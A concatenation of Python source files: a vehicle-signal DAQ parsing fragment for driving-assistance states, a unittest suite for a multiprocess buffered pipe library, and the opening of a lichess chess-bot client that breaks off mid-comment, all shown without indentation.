elif '._isHFQuit' in name_tmp:
self.redis_dict_raw['vehInfo']['HF_quit'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._isAdQuit' in name_tmp:
self.redis_dict_raw['vehInfo']['AD_quit'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._m_ifNeedPressButtonForLC' in name_tmp:
self.redis_dict_raw['vehInfo']['LC_confirmation'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._m_isADActiveReminder' in name_tmp:
self.redis_dict_raw['vehInfo']['is_AD_active_reminder'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_adCannotActiveReason' in name_tmp:
self.redis_dict_raw['vehInfo']['AD_inactive_reason'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_HFTakeOverReqWarningLevel' in name_tmp:
self.redis_dict_raw['vehInfo']['HF_tor_reason'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_isHFwillExitSoon' in name_tmp:
self.redis_dict_raw['vehInfo']['HF_exit_forecast'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_isHFActive' in name_tmp:
self.redis_dict_raw['vehInfo']['HF'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_adEnterRampReminder' in name_tmp:
self.redis_dict_raw['vehInfo']['AD_enter_ramp'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_vDisInKph' in name_tmp:
self.redis_dict_raw['vehInfo']['VehSpd'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_ayvRef_sw' in name_tmp:
self.redis_dict_raw['vehInfo']['ayv'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_axvRef_sw' in name_tmp:
self.redis_dict_raw['vehInfo']['axv'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_alcState' in name_tmp:
self.redis_dict_raw['vehInfo']['ALC'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_latState' in name_tmp:
self.redis_dict_raw['vehInfo']['TJA'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_longState' in name_tmp:
self.redis_dict_raw['vehInfo']['ACC'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_isLeftDodgeActive' in name_tmp:
self.redis_dict_raw['vehInfo']['LOC_L'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_isRightDodgeActive' in name_tmp:
self.redis_dict_raw['vehInfo']['LOC_R'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_ldwState' in name_tmp:
self.redis_dict_raw['vehInfo']['LDW'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_netsigVCU_CrntGearLvl' in name_tmp:
self.redis_dict_raw['vehInfo']['Gear'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_netsigMRR_TargetSpd' in name_tmp:
self.redis_dict_raw['vehInfo']['TargetSpd'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_LCTriggerSide' in name_tmp:
self.redis_dict_raw['vehInfo']['Auto_LC'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_softSwitchStatus'):
self.redis_dict_raw['vehInfo']['AD_Switch'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_switchOnAfterReminder'):
self.redis_dict_raw['vehInfo']['AD_on_remind'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_isADActive'):
self.redis_dict_raw['vehInfo']['AD'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_netsigBCM_LeftTurnLampSt'):
self.redis_dict_raw['vehInfo']['TurnLight_L'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_netsigBCM_RightTurnLampSt'):
self.redis_dict_raw['vehInfo']['TurnLight_R'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_egoLaneChangeGo'):
self.redis_dict_raw['traj']['ss_status'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_dVmcToAc_left'):
self.redis_dict_raw['traj']['ss_left_end'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_dVmcToDc_left'):
self.redis_dict_raw['traj']['ss_left_start'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_dVmcToAc_right'):
self.redis_dict_raw['traj']['ss_right_end'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_dVmcToDc_right'):
self.redis_dict_raw['traj']['ss_right_start'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_vmcTrajCoefficientOutput._m_value' in name_tmp:
self.redis_dict_raw['traj']['a' + name_tmp.split('.')[-1].replace('_', '')]\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_vmcTrajDxEndOutput'):
self.redis_dict_raw['traj']['dx_end'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
else:
print('Error occurred in variable walk through: ' + name_tmp)
byte_ptr += abs(each_item[2]) % 32
self.daq_len = byte_ptr
self.daq = bytes(byte_ptr)
self.daq_num = len(daq_tmp.keys())
self.calc_daq_pack_len(daq_tmp)
def calc_daq_pack_len(self, daq_tmp):
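        # Added commentary: daq_pack_len collects the raw payload bytes per DAQ list,
        # while daq_pack_len_list additionally counts what appears to be framing
        # overhead of 6 bytes per ODT plus 4 bytes per DAQ list.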
for i in range(len(daq_tmp.keys())):
len_tmp = 0
for j in range(len(daq_tmp[i].keys())):
for each_item in daq_tmp[i][j]:
len_tmp += abs(each_item[2]) % 32
self.daq_pack_len.append(len_tmp)
len_tmp += 6 * len(daq_tmp[i].keys()) + 4
self.daq_pack_len_list.append(len_tmp)
|
generic_pipe.py
|
import collections
import copy
import hashlib
import itertools
import multiprocessing
import os
import random
import sys
import threading
import time
import unittest
from buffered_pipe import Generic_Pipe as Pipe
Testing_Types = "LO"
if len(sys.argv) > 1:
try:
Testing_Types = sys.argv[1]
except:
...
# random_bytes = lambda n: bytes(random.randint(0, 255) for _ in range(n))
total_gen_bytes = 0
def random_bytes(n):
global total_gen_bytes
total_gen_bytes += n
return os.urandom(n)
def dataset(length, count):
return [random_bytes(random.randint(*length)) for _ in range(count)]
def producer(pipe, data):
for I in data:
pipe.send(I)
def mpmt_producer(pipe, data: list, barrier: multiprocessing.Barrier):
# print(f"prod reach barrier", "%x"%threading.current_thread().ident)
barrier.wait()
# print(f"prod pass barrier", "%x"%threading.current_thread().ident)
for I in data:
pipe.send(I)
# print(f"prod finish")
# print(f"prod finish with send {len(data)} elements")
def mpmt_consumer(pipe, RTQ: multiprocessing.Queue, finished: bytes, barrier: multiprocessing.Barrier):
# print(f"cons reach barrier", "%x"%threading.current_thread().ident)
barrier.wait()
# print(f"cons pass barrier", "%x"%threading.current_thread().ident)
items = []
while True:
data = pipe.recv()
if data == finished:
break
items.append(data)
# print(f"cons finish")
# print(f"cons finish with recv {len(items)} elements")
RTQ.put(items)
# print(f"cons Qin finish")
def type_tester(pipe, data):
# single prod, single cons
for idx, exp in enumerate(data):
ret = pipe.recv()
if exp != ret:
raise Exception(f"{exp} != {ret} at {idx}")
return True
def joinable_test(Idatas, Odatas):
# 1. count
# 2. each Idata possible in Odatas
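    # Roughly: check that every consumer's output could have been produced by
    # interleaving the producers' inputs - the multisets of items match, and for
    # each producer the items that landed in any single consumer appear there in
    # the producer's send order. Items are compared by SHA-256 digest.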
def _sub(I_set, Odatas):
def pruning(selected, options):
update = False
S_pos = [-1] * len(Odatas)
for i in range(len(selected)):
if selected[i] is None:
options[i] = [(r, c) for r, c in options[i] if S_pos[r] < c]
if len(options[i]) == 1:
selected[i] = options[i][0]
update = True
if selected[i] is not None:
S_pos[selected[i][0]] = selected[i][1]
E_pos = [len(I) for I in Odatas]
for i in range(len(selected) - 1, -1, -1):
if selected[i] is None:
options[i] = [(r, c) for r, c in options[i] if E_pos[r] > c]
if len(options[i]) == 1:
selected[i] = options[i][0]
update = True
if selected[i] is not None:
E_pos[selected[i][0]] = selected[i][1]
return update
def rec_solver(selected, options):
update = True
while update:
update = pruning(selected, options)
if all(map(lambda x: x is not None, selected)):
return True
for i in range(len(selected)):
if selected[i] is None:
for o in options[i]:
# print("try random")
s_cp, o_cp = copy.copy(selected), copy.copy(options)
s_cp[i] = o
if rec_solver(s_cp, o_cp):
return True
return False
E_pos = collections.defaultdict(list)
E_rpos = collections.defaultdict(list)
for i, I in enumerate(I_set):
E_pos[I].append(i)
for i, OD in enumerate(Odatas):
for j, O in enumerate(OD):
if O in E_pos:
E_rpos[O].append((i, j))
return rec_solver([None] * len(I_set), [E_rpos[I] for I in I_set])
Idatas = [[hashlib.sha256(J).digest() for J in I] for I in Idatas]
Odatas = [[hashlib.sha256(J).digest() for J in I] for I in Odatas]
Iset = collections.Counter(itertools.chain.from_iterable(Idatas))
Oset = collections.Counter(itertools.chain.from_iterable(Odatas))
if Oset.keys() - (Iset.keys() & Oset.keys()):
        # received data that was never sent
return -1
if len(Oset) != len(Iset):
        # unique counts do not match
return -2
if Iset != Oset:
return -3
return all(_sub(I, Odatas) for I in Idatas)
def type20_tester(pipe_r, pipe_w, *data, mp_prod=0, mt_prod=0, mp_cons=0, mt_cons=0, end_Data=None, ctx=None):
# def type20_tester(pipe_r, pipe_w, *data, mp_prod = 0, mt_prod = 0, ctx = None):
# multi prod, main thread cons
# print(f"mp_prod = {mp_prod} , mt_prod = {mt_prod}")#, end_Data = {end_Data} ")
assert len(data) == mp_prod + mt_prod
ctx = ctx or multiprocessing.get_context()
prod_barrier = ctx.Barrier(mp_prod + mt_prod)
get_args = lambda idx: (pipe_w, data[idx], prod_barrier)
mp_prods = [ctx.Process(target=mpmt_producer, args=get_args(idx)) for idx in range(mp_prod)]
mt_prods = [threading.Thread(target=mpmt_producer, args=get_args(mp_prod + idx)) for idx in range(mt_prod)]
# print(f"MPST prod ({len(mp_prods + mt_prods)}) start with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
for MPMT in itertools.chain(mp_prods, mt_prods):
MPMT.start()
# time.sleep(0.02)
# print("MPSC cons collect")
result = []
for _ in range(sum(map(len, data))):
result.append(pipe_r.recv())
# print("MPSC prod join")
for MPMT in itertools.chain(mp_prods, mt_prods):
MPMT.join()
# print("joinable result")
R = joinable_test(data, [result])
# print(f"MPST prod ({len(mp_prods + mt_prods)}) end with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
return R
def type02_tester(pipe_r, pipe_w, *data, mp_prod=0, mt_prod=0, mp_cons=0, mt_cons=0, end_Data=None, ctx=None):
# def type02_tester(pipe_r, pipe_w, *data, mp_cons = 0, mt_cons = 0, end_Data = None, ctx = None):
# main thread prod, multi cons
# print(f"mp_cons = {mp_cons}, mt_cons = {mt_cons}")#, end_Data = {end_Data} ")
assert len(data) == 1
ctx = ctx or multiprocessing.get_context()
RTQ = ctx.SimpleQueue()
cons_barrier = ctx.Barrier(mp_cons + mt_cons)
args = (pipe_r, RTQ, end_Data, cons_barrier)
mp_conss = [ctx.Process(target=mpmt_consumer, args=args) for _ in range(mp_cons)]
mt_conss = [threading.Thread(target=mpmt_consumer, args=args) for _ in range(mt_cons)]
# print(f"SPMT cons ({len(mp_conss + mt_conss)}) start with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
for MPMT in itertools.chain(mp_conss, mt_conss):
MPMT.start()
# print("SPMC send data")
for I in data[0]:
pipe_w.send(I)
# print("SPMC cons send end_Data")
for MPMT in itertools.chain(mp_conss, mt_conss):
pipe_w.send(end_Data)
# print("SPMC cons collect")
results = []
for MPMT in itertools.chain(mp_conss, mt_conss):
results.append(RTQ.get())
# print("SPMC cons join")
for MPMT in itertools.chain(mp_conss, mt_conss):
MPMT.join()
# print("joinable result")
R = joinable_test(data, results)
# print(f"MPST prod ({len(mp_conss + mt_conss)}) end with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
return R
def type22_tester(pipe_r, pipe_w, *data, mp_prod=0, mt_prod=0, mp_cons=0, mt_cons=0, end_Data=None, ctx=None):
# multi prod, multi cons
# print(f"mp_prod = {mp_prod} , mt_prod = {mt_prod}, mp_cons = {mp_cons}, mt_cons = {mt_cons}")#, end_Data = {end_Data} ")
assert len(data) == mp_prod + mt_prod
ctx = ctx or multiprocessing.get_context()
RTQ = ctx.SimpleQueue()
prod_barrier = ctx.Barrier(mp_prod + mt_prod)
cons_barrier = ctx.Barrier(mp_cons + mt_cons)
# prod_barrier = cons_barrier = ctx.Barrier(mp_prod + mt_prod + mp_cons + mt_cons)
get_args = lambda idx: (pipe_w, data[idx], prod_barrier)
mp_prods = [ctx.Process(target=mpmt_producer, args=get_args(idx)) for idx in range(mp_prod)]
mt_prods = [threading.Thread(target=mpmt_producer, args=get_args(mp_prod + idx)) for idx in range(mt_prod)]
args = (pipe_r, RTQ, end_Data, cons_barrier)
mp_conss = [ctx.Process(target=mpmt_consumer, args=args) for _ in range(mp_cons)]
mt_conss = [threading.Thread(target=mpmt_consumer, args=args) for _ in range(mt_cons)]
# print(f"MPMC prod ({len(mp_prods + mt_prods)}) / cons ({len(mp_conss + mt_conss)}) start with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
for MPMT in itertools.chain(mp_prods, mt_prods, mp_conss, mt_conss):
MPMT.start()
# time.sleep(0.02)
# print(f"MPMC prod join")
for MPMT in itertools.chain(mp_prods, mt_prods):
MPMT.join()
# print(f"MPMC cons finish final data send")
for MPMT in itertools.chain(mp_conss, mt_conss):
pipe_w.send(end_Data)
# print(f"MPMC cons collect")
results = []
for MPMT in itertools.chain(mp_conss, mt_conss):
results.append(RTQ.get())
# print(f"MPMC cons join")
for MPMT in itertools.chain(mp_conss, mt_conss):
MPMT.join()
# print(f"MPMC joinable result")
# print('\n----------------\n', data, '\n', results, '\n=============\n')
# print(f"\n----------------\n {[len(I) for I in data]} \n {[len(I) for I in results]} \n=============\n")
R = joinable_test(data, results)
# if R is not True:
# print(f"\n----------------\n {data} \n {results} \n=============\n")
# print(f"MPMC prod ({len(mp_prods + mt_prods)}) / cons ({len(mp_conss + mt_conss)}) end with {threading.activeCount()} mt {multiprocessing.active_children()} mp ")
return R
class transfer_tracker:
@classmethod
def setUpClass(cls):
try:
cls.transfers
except:
cls.transfers = 0
cls.transfers -= total_gen_bytes
@classmethod
def tearDownClass(cls):
cls.transfers += total_gen_bytes
print(f"{cls.__name__} transfer = {cls.transfers}")
for K, V in cls.spend_time.items():
print(f"{K} : {V: 4.2f}")
class TestCase_SPSC:
spend_time = collections.defaultdict(float)
def __init__(self, length, count, buf_size, concurrency, seed):
self.length = length
self.count = count
self.buf_size = buf_size
self.concurrency = concurrency
self.seed = seed
def mp_test(self, data, ctx=multiprocessing.get_context(), spend_time=None):
spend_time[type(ctx).__name__] -= time.time()
pipe_r, pipe_w = Pipe(self.buf_size, 64 if 64 < self.buf_size else 2, self.concurrency, self.concurrency)
P = ctx.Process(target=producer, args=(pipe_w, data))
P.start()
result = type_tester(pipe_r, data)
spend_time[type(ctx).__name__] += time.time()
return result
def mt_test(self, data, spend_time=None):
spend_time["threading"] -= time.time()
pipe_r, pipe_w = Pipe(self.buf_size, 64 if 64 < self.buf_size else 2, self.concurrency, self.concurrency)
P = threading.Thread(target=producer, args=(pipe_w, data))
P.start()
spend_time["threading"] += time.time()
return type_tester(pipe_r, data)
@classmethod
def test_all(cls, length, count, buf_size, concurrency, seed, utc):
TC = cls(length, count, buf_size, concurrency, seed)
utc.spend_time["data gen"] -= time.time()
random.seed(seed)
data = dataset(length, count)
utc.spend_time["data gen"] += time.time()
kwargs = {"data": data, "spend_time": utc.spend_time}
utc.assertEqual(TC.mp_test(ctx=multiprocessing.get_context("fork"), **kwargs), True)
utc.assertEqual(TC.mp_test(ctx=multiprocessing.get_context("spawn"), **kwargs), True)
utc.assertEqual(TC.mp_test(ctx=multiprocessing.get_context("forkserver"), **kwargs), True)
utc.assertEqual(TC.mt_test(**kwargs), True)
class Type_0(transfer_tracker, unittest.TestCase):
spend_time = collections.defaultdict(float)
def test_small1(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((4, 4), 2**15, 5, 1, seed, self)
def test_small2(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((4, 4), 2**15, 20, 1, seed, self)
def test_small3(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((4, 4), 2**15, 16, 4, seed, self)
def test_small4(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((1, 2**7), 2**14, 2**5, 4, seed, self)
def test_small5(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((1, 2**7), 2**14, 2**10, 4, seed, self)
def test_small6(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((1, 2**10), 2**12, 2**12, 16, seed, self)
def test_small7(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
TestCase_SPSC.test_all((1, 2**16), 2**8, 2**18, 16, seed, self)
class TestCase_MPMC_base:
# mtmc_seed = 0
# spend_time = collections.defaultdict(float)
# target_fn = type22_tester
def __init__(self, length, buf_size, concurrency, seed):
self.length = length
self.buf_size = buf_size
self.concurrency = concurrency
self.seed = seed
def run_test(self, data, end_Data, cons_cnt, ctx=multiprocessing.get_context(), spend_time=None):
spend_time[type(ctx).__name__] -= time.time()
pipe_r, pipe_w = Pipe(self.buf_size, 64 if 64 < self.buf_size else 2, self.concurrency, self.concurrency)
random.seed(type(self).mtmc_seed)
type(self).mtmc_seed += 1
mp_prod = random.randrange(0, len(data))
mt_prod = len(data) - mp_prod
mp_cons = random.randrange(0, cons_cnt)
mt_cons = cons_cnt - mp_cons
result = type(self).target_fn(
pipe_r,
pipe_w,
*data,
mp_prod=mp_prod,
mt_prod=mt_prod,
mp_cons=mp_cons,
mt_cons=mt_cons,
end_Data=end_Data,
ctx=ctx,
)
spend_time[type(ctx).__name__] += time.time()
return result
@classmethod
def test_all(cls, length, data_size_range, prod_cnt, cons_cnt, buf_size, concurrency, seed, utc):
TC = cls(length, buf_size, concurrency, seed)
while True:
utc.spend_time["data gen"] -= time.time()
random.seed(seed)
data = [dataset(length, random.randrange(*data_size_range)) for _ in range(prod_cnt)]
utc.spend_time["data gen"] += time.time()
utc.spend_time["search unused"] -= time.time()
data_hashes = set(hashlib.sha256(I).digest() for I in itertools.chain.from_iterable(data))
end_Data = dataset(length, 1)[0]
for _ in range(10):
if hashlib.sha256(end_Data).digest() not in data_hashes:
break
end_Data = dataset(length, 1)[0]
utc.spend_time["search unused"] += time.time()
if hashlib.sha256(end_Data).digest() not in data_hashes:
break
kwargs = {"data": data, "end_Data": end_Data, "cons_cnt": cons_cnt, "spend_time": utc.spend_time}
utc.assertEqual(TC.run_test(ctx=multiprocessing.get_context("fork"), **kwargs), True)
utc.assertEqual(TC.run_test(ctx=multiprocessing.get_context("spawn"), **kwargs), True)
utc.assertEqual(TC.run_test(ctx=multiprocessing.get_context("forkserver"), **kwargs), True)
def random_ordered_cycle(S, E):
local_random = random.Random(123)
while True:
X = list(range(S, E))
local_random.shuffle(X)
yield from X
class Test_suite_base:
# target_class = TestCase_MPMC
# prod_cnt_ord = random_ordered_cycle(1, 4)
# cons_cnt_ord = random_ordered_cycle(1, 4)
def test_small1(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (1, 10), *cnt_case, 5, 1, seed, self)
def test_small2(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (1, 100), *cnt_case, 20, 4, seed, self)
def test_small3(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (10, 100), *cnt_case, 16, 4, seed, self)
def test_small4(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**7), (1, 50), *cnt_case, 2**10, 4, seed, self)
def test_small5(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**7), (0, 10), *cnt_case, 2**16, 16, seed, self)
def test_small6(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**10), (0, 50), *cnt_case, 2**14, 16, seed, self)
class Test_suite_large:
# target_class = TestCase_MPMC
# prod_cnt_ord = random_ordered_cycle(1, 4)
# cons_cnt_ord = random_ordered_cycle(1, 4)
if "L" in Testing_Types:
def test_small1(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (1, 100), *cnt_case, 2, 1, seed, self)
def test_small2(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (1, 1000), *cnt_case, 3, 4, seed, self)
def test_small3(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((4, 4), (100, 10000), *cnt_case, 16, 4, seed, self)
def test_small4(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**7), (1, 50000), *cnt_case, 2**16, 32, seed, self)
def test_small5(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**7), (0, 100000), *cnt_case, 2**18, 16, seed, self)
def test_small6(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 2**10), (0, 50000), *cnt_case, 2**18, 32, seed, self)
class Test_suite_OOS: # out of standard; object size is not multiple of 4
# target_class = TestCase_MPMC
# prod_cnt_ord = random_ordered_cycle(1, 4)
# cons_cnt_ord = random_ordered_cycle(1, 4)
if "O" in Testing_Types:
def test_small1(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 1), (1, 10), *cnt_case, 2, 1, seed, self)
def test_small2(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((1, 3), (1, 10), *cnt_case, 2**7, 4, seed, self)
def test_small3(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((5, 7), (1, 100), *cnt_case, 2**7, 16, seed, self)
def test_small4(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((9, 11), (1, 100), *cnt_case, 2**7, 16, seed, self)
def test_small5(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((13, 15), (1, 500), *cnt_case, 2**9, 16, seed, self)
def test_small6(self):
for seed in [123, 1251, 523, 12, 3535, 167, 945, 933]:
cnt_case = next(type(self).prod_cnt_ord), next(type(self).cons_cnt_ord)
type(self).target_class.test_all((17, 19), (1, 1000), *cnt_case, 2**9, 20, seed, self)
class TestCase_MPSC(TestCase_MPMC_base):
mtmc_seed = 0
target_fn = type20_tester
class Type_1(transfer_tracker, unittest.TestCase, Test_suite_base):
target_class = TestCase_MPSC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 5)
cons_cnt_ord = itertools.cycle([1])
class Type_1L(transfer_tracker, unittest.TestCase, Test_suite_large):
target_class = TestCase_MPSC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 20)
cons_cnt_ord = itertools.cycle([1])
class Type_1O(transfer_tracker, unittest.TestCase, Test_suite_OOS):
target_class = TestCase_MPSC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 10)
cons_cnt_ord = itertools.cycle([1])
class TestCase_SPMC(TestCase_MPMC_base):
mtmc_seed = 0
target_fn = type02_tester
class Type_2(transfer_tracker, unittest.TestCase, Test_suite_base):
target_class = TestCase_SPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = itertools.cycle([1])
cons_cnt_ord = random_ordered_cycle(1, 5)
class Type_2L(transfer_tracker, unittest.TestCase, Test_suite_large):
target_class = TestCase_SPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = itertools.cycle([1])
cons_cnt_ord = random_ordered_cycle(1, 20)
class Type_2O(transfer_tracker, unittest.TestCase, Test_suite_OOS):
target_class = TestCase_SPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = itertools.cycle([1])
cons_cnt_ord = random_ordered_cycle(1, 10)
class TestCase_MPMC(TestCase_MPMC_base):
mtmc_seed = 0
target_fn = type22_tester
class Type_3(transfer_tracker, unittest.TestCase, Test_suite_base):
target_class = TestCase_MPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 5)
cons_cnt_ord = random_ordered_cycle(1, 5)
class Type_3L(transfer_tracker, unittest.TestCase, Test_suite_large):
target_class = TestCase_MPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 20)
cons_cnt_ord = random_ordered_cycle(1, 20)
class Type_3O(transfer_tracker, unittest.TestCase, Test_suite_OOS):
target_class = TestCase_MPMC
spend_time = collections.defaultdict(float)
prod_cnt_ord = random_ordered_cycle(1, 10)
cons_cnt_ord = random_ordered_cycle(1, 10)
if __name__ == "__main__":
path_info = __file__.split("/")
path_info = "/".join(path_info[path_info.index("tests") :])
print(path_info)
unittest.main(argv=[""])
|
lichess_bot.py
|
import argparse
import chess
from chess.variant import find_variant
import chess.polyglot
import engine_wrapper
import model
import json
import lichess
import logging
import multiprocessing
import traceback
import logging_pool
import signal
import sys
import time
import backoff
import threading
from config import load_config
from conversation import Conversation, ChatLine
from functools import partial
from requests.exceptions import (
ChunkedEncodingError,
ConnectionError,
HTTPError,
ReadTimeout,
)
from urllib3.exceptions import ProtocolError
from ColorLogger import enable_color_logging
logger = logging.getLogger(__name__)
try:
from http.client import RemoteDisconnected
# New in version 3.5: Previously, BadStatusLine('') was raised.
except ImportError:
from http.client import BadStatusLine as RemoteDisconnected
__version__ = "1.1.4"
terminated = False
def signal_handler(signal, frame):
global terminated
logger.debug("Recieved SIGINT. Terminating client.")
terminated = True
signal.signal(signal.SIGINT, signal_handler)
def is_final(exception):
return isinstance(exception, HTTPError) and exception.response.status_code < 500
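# is_final() is used as the give-up predicate for the backoff decorator on play_game():
# 4xx responses are treated as permanent failures, while 5xx responses and
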